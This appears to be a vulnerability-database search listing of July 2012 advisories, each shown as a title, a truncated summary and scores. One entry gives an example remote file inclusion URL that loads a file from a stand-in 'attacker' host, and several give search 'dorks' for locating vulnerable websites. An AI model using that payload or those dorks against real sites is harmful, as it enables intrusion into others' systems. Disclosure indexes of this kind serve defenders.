Lucene search
K
SecurityvulnsRecent

47153 matches found

securityvulns
securityvulns
added 2012/07/11 12:0 a.m.80 views

[CVE-2012-3376] Apache Hadoop HDFS information disclosure vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, Users of Apache Hadoop should be aware of a security vulnerability recently discovered, as described by the following CVE. In particular, please note the "Users affected", "Versions affected", and "Mitigation" sections. The project team will be...

7.5CVSS0.2AI score0.02655EPSS
Exploits1
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.98 views

AST-2012-011: Remote crash vulnerability in voice mail application

Asterisk Project Security Advisory - AST-2012-011 Product Asterisk Summary Remote crash vulnerability in voice mail application Nature of Advisory Denial of Service Susceptibility Remote authenticated sessions Severity Moderate Exploits Known No Reported On June 13, 2012 Reported By Nicolas...

4CVSS0.5AI score0.03197EPSS
Exploits0
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.38 views

Microsoft Office security vulnerabilities

VBA unsafe library loading, Office for Mac weak files permissions...

6.9CVSS2.9AI score0.21028EPSS
Exploits1Affected Software1
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.40 views

Microsoft Sharepoint multiple security vulnerabilities

Crossite scripting, URL redirection...

6.8CVSS1AI score0.2308EPSS
Exploits9
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.86 views

NDTV Cross Site Scripting Vulnerabilitiy

Exploit Title : NDTV Cross Site Scripting Vulnerabilitiy Author : Iranian Security & Research Team Discovered By : zilli0o0n Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.ndtv.com DorK : "Copyright NDTV Convergence Limited 2012"...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.100 views

Behsamanco CMS Editor Vulnerability

Exploit Title : Behsamanco CMS Editor Vulnerability Author : Iranian Security & Research Team Discovered By : R3dMind Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.behsamanco.com Security Risk : high Dork : inurl:".ir/Controls/TextEditor/"...

Exploits0
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.88 views

BookNux 0.2 <= Multiple Vulnerabilities

BookNux 0.2 = Multiple Vulnerabilities Discovered by: Jean Pascal Pereira [email protected] Vendor information: "Commentics is a free, advanced PHP comment script with many features. Professionally written and with open source code, its main aims are to be integrable, customizable and secure."...

1AI score
Exploits0
securityvulns
securityvulns
added 2012/07/11 12:0 a.m.88 views

[SECURITY] CVE-2012-2138 Apache Sling denial of service vulnerability

CVE-2012-2138 : Apache Sling denial of service vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: org.apache.sling.servlets.post bundle up to 2.1.0 Description: The @CopyFrom operation of the Sling POST servlet allows for copying a parent node to one of it...

5CVSS0.7AI score0.14122EPSS
Exploits3
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.68 views

[USN-1444-1] BackupPC vulnerability

========================================================================== Ubuntu Security Notice USN-1444-1 May 17, 2012 backuppc vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

4.3CVSS0.3AI score0.02067EPSS
Exploits1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.64 views

CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability

Severity: important Vendor: The Apache Software Foundation Versions Affected: Roller 4.0.0 to Roller 4.0.1 Roller 5.0 The unsupported Roller 3.1 release is also affected Description: HTTP POST interfaces in the Roller admin/editor console were not protected from CSRF attacks. This issue has been...

0.2AI score0.01592EPSS
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.339 views

IIS Short File/Folder Name Disclosure by using tilde ~ character

Link: http://soroush.secproject.com/downloadable/iistildeshortnamedisclosure.txt Exploit-db link: www.exploit-db.com/exploits/19525/ ---------------------------- Security Research - IIS Short File/Folder Name Disclosure Website : http://soroush.secproject.com/blog/ I. BACKGROUND...

Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.81 views

[USN-1497-1] Nova vulnerabilities

========================================================================== Ubuntu Security Notice USN-1497-1 July 03, 2012 nova vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubunt...

5.5CVSS0.9AI score0.02997EPSS
Exploits2
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.102 views

NGS00162 Patch Notification: Symantec Message Filter Session Hijacking via session fixation

High Risk Vulnerability in Symantec Message Filter 2 July 2012 Ben Williams of NCC Group has discovered a High risk vulnerability in Symantec Message Filter Impact: Session Hijacking via session fixation Versions affected: Symantec Message Filter Version 6.3 An updated version of the software has...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.99 views

Forum Oxalis 0.1.2 <= SQL Injection Vulnerability

Forum Oxalis 0.1.2 = SQL Injection Vulnerability Discovered by: Jean Pascal Pereira [email protected] Vendor information: "Forum Oxalis is a minimalis GPL PHP forum using CSS." Vendor URI: http://developer.berlios.de/projects/forumoxalis/ Risk-level: High The application is prone to a remote SQL...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.43 views

XSS, Redirector and FPD vulnerabilities in WordPress

Hello 3APA3A! In June I've disclosed vulnerabilities in WordPress, which I'd present for you. They take place in plugin Akismet for WordPress and it's core-plugin since version WP 2.0, so these vulnerabilities concern WordPress itself. This is the first in series of advisories concerning...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.144 views

[SECURITY] [DSA 2504-1] libspring-2.5-java security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2504-1 [email protected] http://www.debian.org/security/ Florian Weimer June 28, 2012 http://www.debian.org/security/faq -...

7.5CVSS1AI score0.11779EPSS
Exploits1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.29 views

IBM Edge Components Caching Proxy crossite scripting

Crossite scripting on non-existent page...

6.8CVSS1.7AI score0.03278EPSS
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.70 views

Event Script PHP v1.1 CMS - Multiple Web Vulnerabilites

Title: ====== Event Script PHP v1.1 CMS - Multiple Web Vulnerabilites Date: ===== 2012-06-10 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=606 VL-ID: ===== 606 Common Vulnerability Scoring System: ==================================== 7 Introduction: ============= Even...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.45 views

MIT Kerberos 5 kadmind DoS

NULL pointer dereference...

4CVSS2.6AI score0.03115EPSS
Exploits1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.50 views

Cyberoam advisory

Vulnerability in Cyberoam DPI devices 30 Jun 2012 CVE-2012-3372 =================================================================== Cyberoam make a range of DPI devices http://www.cyberoamworks.com/ which are capable of intercepting SSL connections. In common with all such devices, in order to...

5.8CVSS0.5AI score0.00938EPSS
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.27 views

Symantec Message Filter session hijacking

No description provided...

1.5AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.38 views

HP Device Access Manager for Protect Tools Information Store ActiveX memory corruption

Buffer overflows in different methods...

7.5CVSS4.2AI score0.07981EPSS
Exploits1References3Affected Software2
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.50 views

Basilic RCE bug

Hi Dear Sir Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center. there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server. sample:...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.97 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian security & Research Lab Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

1.6AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.135 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...

1AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.19 views

EMC RSA Access Manager replay attack

It's possible to replays sniffed session...

4.6AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.25 views

HP Photosmart printers DoS

No description provided...

7.8CVSS1.4AI score0.02335EPSS
Exploits0References1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.31 views

bcfg2 shell chatacters vulnerability

It's possible to execute code as a root...

9CVSS4.9AI score0.0382EPSS
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.39 views

Microsoft IIS security vulnerabilities

Requests flood with sign in the path leads to server DoS; files and folders are accessible via 8.3 name making it easier to bruteforce names of hidden files and folders...

2.8AI score
Exploits0References2
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.51 views

[security bulletin] HPSBPI02794 SSRT100542 rev.1 - Certain HP Photosmart Printers, Remote Denial of Service (DoS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c02931414 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02931414 Version: 1 HPSBPI02794...

7.8CVSS0.3AI score0.02335EPSS
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.62 views

NGS00194 Patch Notification: Nagios XI Network Monitor Blind SQL Injection

High Risk Vulnerability in Nagios XI Network Monitor 2 July 2012 Daniel Compton of NCC Group has discovered a High risk vulnerability in Nagios XI Network Monitor Impact: Nagios XI Network Monitor Blind SQL Injection Versions affected: Nagios XI Network Monitor 2011R1.9 An updated version of the...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.65 views

SEC Consult SA-20120626-0 :: Zend Framework - Local file disclosure via XXE injection

SEC Consult Vulnerability Lab Security Advisory 20120626-0 ======================================================================= title: Local file disclosure via XXE injection product: Zend Framework vulnerable version: 1.11.11 1.12.0 RC1 2.0.0 beta4 and earlier versions / branches fixed versio...

7.6AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.117 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian Security & Research Team Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.59 views

plow 0.0.5 <= Buffer Overflow Vulnerability

plow 0.0.5 = Buffer Overflow Vulnerability Discovered by: Jean Pascal Pereira [email protected] Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ Risk-level: Medium The application is prone to a local buffer overflow...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.40 views

plow 0.0.5 <= Buffer Overflow Vulnerability

plow 0.0.5 = Buffer Overflow Vulnerability Discovered by: Jean Pascal Pereira [email protected] Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ Risk-level: Medium The application is prone to a local buffer overflow...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.83 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.67256EPSS
Exploits31References26Affected Software14
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.65 views

[USN-1488-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1488-1 June 29, 2012 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

7.2CVSS0.2AI score0.00979EPSS
Exploits4
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.54 views

Linux kernel multiple security vulnerabilities

DoS, privilege escalation...

7.2CVSS2.7AI score0.00979EPSS
Exploits5References2Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.36 views

ESA-2012-026: RSA Access Manager Session Replay Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-026: RSA Access Manager Session Replay Vulnerability EMC Identifier: ESA-2012-026 CVE Identifier: CVE-2012-2281 Severity Rating: CVSSv2 Base Score: 6. 8 AV:A/AC:H/Au:N/C:C/I:C/A:C Affected Products: RSA Access Manager Server version 6.0.x RSA...

6.8CVSS0.2AI score0.0068EPSS
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.77 views

[CVE-2012-0694] SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution

------------------------------------------------------- SugarCRM CE = 6.3.1 "unserialize" PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software link....: http://www.sugarcrm.com/ -...

1.2AI score0.67256EPSS
Exploits13
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.53 views

IBM Edge Components Caching Proxy XSS Followup

Rapid7 probably found this vulnerability on October 23 2002 http://seclists.org/fulldisclosure/2002/Oct/330 and its called CVE- 2002-1167 They don't show the output and specify it is error message but the injection method is the same. The update is it works on IBM Edge Components Caching Proxy -...

Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.10752 views

GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilites

Title: ====== GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilites Date: ===== 2012-06-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=601 VL-ID: ===== 601 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: =============...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.45 views

ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-106 June 28, 2012 - -- CVE ID: CVE-2012-3811 - -- CVSS: 9.7, AV:N/AC:L/Au:N/C:C/I:C/A:P - --...

10CVSS0.5AI score0.62876EPSS
Exploits8
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.30 views

Avaya IP Office Customer Call Reporter code execution

It's possible to upload executable files via ImageUpload.ashx...

10CVSS3.4AI score0.62876EPSS
Exploits8References1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.222 views

REWTERZ-20120629 - TEMENOS T24 Cross-Site Scripting (XSS) Vulnerability

Rewterz Security Research Group Advisory ======================================================== I. Overview ======================================================== A Cross-Site Scripting XSS vulnerability has been identified in TEMENOS T24 Core Banking Solution System. This vulnerability allow...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.49 views

.Net Framework Tilde Character DoS - Sorry, exploit-db link corrected

Link: http://soroush.secproject.com/downloadable/iistildedos.txt Exploit-db link: www.exploit-db.com/exploits/19575 ---------------------------- Security Research - .Net Framework Tilde Character DoS Website : http://soroush.secproject.com/blog/ I. BACKGROUND --------------------- "The .NET...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.47 views

Spring Framework information leakage

No description provided...

7.5CVSS1.7AI score0.11779EPSS
Exploits1References1Affected Software1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.28 views

Cyberoam DPI unsafe certificates

All devices use same certificates for SSL connection hijacking...

2.3AI score
Exploits0References1
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.73 views

[security bulletin] HPSBMU02783 SSRT100806 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03343724 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03343724 Version: 1 HPSBMU02783...

4.3CVSS0.3AI score0.01612EPSS
Exploits0
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.59 views

libtiff library integer overflow

Integer overflow on tiff parsing...

7.5CVSS5.3AI score0.06918EPSS
Exploits0References2Affected Software1
Total number of security vulnerabilities47153